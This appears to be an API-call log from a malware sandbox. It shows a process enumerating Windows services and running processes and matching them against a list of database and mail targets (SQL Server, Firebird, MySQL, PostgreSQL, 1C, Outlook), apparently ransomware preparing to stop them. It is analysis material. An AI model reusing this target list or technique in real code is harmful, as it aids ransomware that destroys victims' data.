	[0164.688] lstrlenW (lpString="SysMain") returned 7
	[0164.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0164.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0164.688] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0164.689] lstrlenW (lpString="Themes") returned 6
	[0164.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0164.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0164.689] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0164.689] lstrlenW (lpString="TrkWks") returned 6
	[0164.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0164.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0164.689] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0164.689] lstrlenW (lpString="UxSms") returned 5
	[0164.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0164.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0164.689] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0164.689] lstrlenW (lpString="WdiServiceHost") returned 14
	[0164.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0164.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0164.689] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0164.689] lstrlenW (lpString="WdiSystemHost") returned 13
	[0164.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0164.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0164.689] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0164.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0164.689] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0164.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.690] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.690] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0164.690] lstrlenW (lpString="Winmgmt") returned 7
	[0164.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0164.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0164.690] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0164.690] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0164.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0164.690] lstrlenW (lpString="WPDBusEnum") returned 10
	[0164.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0164.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0164.690] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0164.690] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0164.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0164.690] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0164.690] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e8
	[0164.692] Process32FirstW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0164.692] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0164.692] lstrlenW (lpString="System") returned 6
	[0164.692] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0164.692] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0164.692] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0164.692] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0164.692] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0164.692] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0164.692] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0164.692] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0164.693] lstrlenW (lpString="smss.exe") returned 8
	[0164.693] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0164.693] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0164.693] lstrlenW (lpString="csrss.exe") returned 9
	[0164.693] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0164.693] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0164.693] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0164.693] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0164.693] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0164.693] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0164.693] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0164.694] lstrlenW (lpString="wininit.exe") returned 11
	[0164.694] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0164.694] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0164.694] lstrlenW (lpString="csrss.exe") returned 9
	[0164.694] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0164.694] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0164.694] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0164.694] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0164.694] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0164.694] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0164.695] lstrlenW (lpString="winlogon.exe") returned 12
	[0164.695] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0164.695] lstrlenW (lpString="services.exe") returned 12
	[0164.695] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0164.695] lstrlenW (lpString="lsass.exe") returned 9
	[0164.695] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0164.696] lstrlenW (lpString="lsm.exe") returned 7
	[0164.696] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.696] lstrlenW (lpString="svchost.exe") returned 11
	[0164.696] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.697] lstrlenW (lpString="svchost.exe") returned 11
	[0164.697] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.697] lstrlenW (lpString="svchost.exe") returned 11
	[0164.697] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.697] lstrlenW (lpString="svchost.exe") returned 11
	[0164.697] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.697] lstrlenW (lpString="svchost.exe") returned 11
	[0164.698] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0164.698] lstrlenW (lpString="audiodg.exe") returned 11
	[0164.698] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.698] lstrlenW (lpString="svchost.exe") returned 11
	[0164.698] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.698] lstrlenW (lpString="svchost.exe") returned 11
	[0164.698] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0164.699] lstrlenW (lpString="spoolsv.exe") returned 11
	[0164.699] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.699] lstrlenW (lpString="svchost.exe") returned 11
	[0164.699] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0164.699] lstrlenW (lpString="taskhost.exe") returned 12
	[0164.699] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0164.700] lstrlenW (lpString="userinit.exe") returned 12
	[0164.700] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0164.700] lstrlenW (lpString="dwm.exe") returned 7
	[0164.700] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0164.700] lstrlenW (lpString="explorer.exe") returned 12
	[0164.700] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0164.701] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0164.701] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0164.701] lstrlenW (lpString="reader_sl.exe") returned 13
	[0164.701] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0164.701] lstrlenW (lpString="drvinst.exe") returned 11
	[0164.701] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0164.702] lstrlenW (lpString="taskhost.exe") returned 12
	[0164.702] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1
	[0164.702] lstrlenW (lpString="consent.exe") returned 11
	[0164.702] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0
	[0164.702] CloseHandle (hObject=0x3e8) returned 1
	[0164.702] Sleep (dwMilliseconds=0x1f4) 
	[0165.530] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0165.530] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0165.531] GetLastError () returned 0xea
	[0165.531] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0165.531] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0165.531] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0165.531] lstrlenW (lpString="Appinfo") returned 7
	[0165.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0165.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0165.532] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0165.532] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0165.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0165.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0165.532] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0165.532] lstrlenW (lpString="AudioSrv") returned 8
	[0165.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0165.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0165.532] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0165.532] lstrlenW (lpString="BFE") returned 3
	[0165.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0165.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0165.532] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0165.532] lstrlenW (lpString="CryptSvc") returned 8
	[0165.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0165.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0165.532] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0165.532] lstrlenW (lpString="CscService") returned 10
	[0165.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0165.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0165.532] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0165.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0165.532] lstrlenW (lpString="DcomLaunch") returned 10
	[0165.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0165.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0165.533] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0165.533] lstrlenW (lpString="Dhcp") returned 4
	[0165.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0165.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0165.533] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0165.533] lstrlenW (lpString="Dnscache") returned 8
	[0165.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0165.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0165.533] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0165.533] lstrlenW (lpString="DPS") returned 3
	[0165.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0165.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0165.533] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0165.533] lstrlenW (lpString="eventlog") returned 8
	[0165.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0165.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0165.533] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0165.533] lstrlenW (lpString="EventSystem") returned 11
	[0165.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0165.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0165.533] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0165.534] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0165.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0165.534] lstrlenW (lpString="gpsvc") returned 5
	[0165.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0165.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0165.534] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0165.534] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0165.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0165.534] lstrlenW (lpString="iphlpsvc") returned 8
	[0165.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0165.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0165.534] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0165.534] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0165.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0165.534] lstrlenW (lpString="LanmanServer") returned 12
